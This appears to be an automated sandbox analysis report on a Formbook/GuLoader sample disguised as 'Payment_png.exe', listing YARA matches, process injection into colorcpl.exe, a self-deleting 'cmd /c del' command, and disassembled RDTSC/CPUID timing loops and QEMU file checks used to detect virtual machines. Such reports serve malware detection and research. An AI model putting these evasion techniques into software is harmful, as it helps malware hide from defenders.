Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E471D55	2_2_1E471D55
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A0D20	2_2_1E3A0D20
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E472D07	2_2_1E472D07
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4725DD	2_2_1E4725DD
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2581	2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BD5E0	2_2_1E3BD5E0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45FA2B	2_2_1E45FA2B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4722AE	2_2_1E4722AE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E44CB4F	2_2_1E44CB4F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E472B28	2_2_1E472B28
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAB40	2_2_1E3CAB40
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DEBB0	2_2_1E3DEBB0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46DBD2	2_2_1E46DBD2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4603DA	2_2_1E4603DA
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4523E3	2_2_1E4523E3
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D138B	2_2_1E3D138B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DABD8	2_2_1E3DABD8
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA830	2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461002	2_2_1E461002
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47E824	2_2_1E47E824
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BB090	2_2_1E3BB090
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4728EC	2_2_1E4728EC
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4720A8	2_2_1E4720A8
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AF900	2_2_1E3AF900
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF	2_2_1E3C99BF
Source: C:\Windows\explorer.exe	Code function: 6_2_0613A062	6_2_0613A062
Source: C:\Windows\explorer.exe	Code function: 6_2_061358F9	6_2_061358F9
Source: C:\Windows\explorer.exe	Code function: 6_2_061382FF	6_2_061382FF
Source: C:\Windows\explorer.exe	Code function: 6_2_06135902	6_2_06135902
Source: C:\Windows\explorer.exe	Code function: 6_2_06138302	6_2_06138302
Source: C:\Windows\explorer.exe	Code function: 6_2_06136362	6_2_06136362
Source: C:\Windows\explorer.exe	Code function: 6_2_0613C5B2	6_2_0613C5B2
Source: C:\Windows\explorer.exe	Code function: 6_2_0613B7C7	6_2_0613B7C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496	14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCD466	14_2_04CCD466
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B477	14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1841F	14_2_04C1841F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD25DD	14_2_04CD25DD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1D5E0	14_2_04C1D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C32581	14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC2D82	14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD1D55	14_2_04CD1D55
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD2D07	14_2_04CD2D07
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C00D20	14_2_04C00D20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD2EF7	14_2_04CD2EF7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCD616	14_2_04CCD616
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C26E30	14_2_04C26E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CDDFCE	14_2_04CDDFCE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD1FF1	14_2_04CD1FF1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD28EC	14_2_04CD28EC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1B090	14_2_04C1B090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C320A0	14_2_04C320A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD20A8	14_2_04CD20A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC1002	14_2_04CC1002
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CDE824	14_2_04CDE824
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2A830	14_2_04C2A830
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C299BF	14_2_04C299BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C0F900	14_2_04C0F900
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C24120	14_2_04C24120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4AEF	14_2_04CC4AEF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD22AE	14_2_04CD22AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CBFA2B	14_2_04CBFA2B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2B236	14_2_04C2B236
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC03DA	14_2_04CC03DA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3ABD8	14_2_04C3ABD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CCDBD2	14_2_04CCDBD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CB23E3	14_2_04CB23E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3138B	14_2_04C3138B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C3EBB0	14_2_04C3EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2AB40	14_2_04C2AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CACB4F	14_2_04CACB4F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C2A309	14_2_04C2A309
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD2B28	14_2_04CD2B28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00958C5B	14_2_00958C5B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00958C60	14_2_00958C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00952D90	14_2_00952D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00952D8F	14_2_00952D8F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00952FB0	14_2_00952FB0

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: String function: 1E3AB150 appears 136 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04C0B150 appears 136 times

Source: Payment_png.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Payment_png.exe, 00000000.00000000.200466328.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.313895649.000000001DC50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.313927300.000000001DEF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.305998798.00000000000B3000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000000.245916312.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
Source: Payment_png.exe	Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe

Source: Payment_png.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/0@13/7

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_01

Source: C:\Users\user\Desktop\Payment_png.exe

File created: C:\Users\user\AppData\Local\Temp\~DF404ACC61CD765358.TMP

Jump to behavior

Source: Payment_png.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment_png.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Payment_png.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Payment_png.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Payment_png.exe	Virustotal: Detection: 70%
Source: Payment_png.exe	Metadefender: Detection: 19%
Source: Payment_png.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Users\user\Desktop\Payment_png.exe	Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_png.exe	Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
Source:	Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match	File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_00408843 push esp; iretd	0_2_0040886A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_00405E7A push esp; iretd	0_2_00405E8E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_004050B4 push esp; iretd	0_2_004050B6
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_00408944 push esp; iretd	0_2_0040896E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3FD0D1 push ecx; ret	2_2_1E3FD0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C5D0D1 push ecx; ret	14_2_04C5D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00960109 push ss; ret	14_2_0096010A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00965268 push esp; iretd	14_2_0096526C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0096B3B5 push eax; ret	14_2_0096B408
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0096B402 push eax; ret	14_2_0096B408
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0096B40B push eax; ret	14_2_0096B472
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0096B46C push eax; ret	14_2_0096B472

Source: C:\Users\user\Desktop\Payment_png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02222C06		0_2_02222C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00562C06		2_2_00562C06

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Payment_png.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002224627 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 00000000022244B4 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 0000000000564627 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 00000000005644B4 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment_png.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 000000000095897E second address: 0000000000958984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Payment_png.exe

Code function: 0_2_02220604 rdtsc

0_2_02220604

Source: C:\Windows\explorer.exe TID: 3096	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 632	Thread sleep time: -34000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000006.00000000.289998327.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000002.481359451.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000006.00000000.290294461.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Payment_png.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
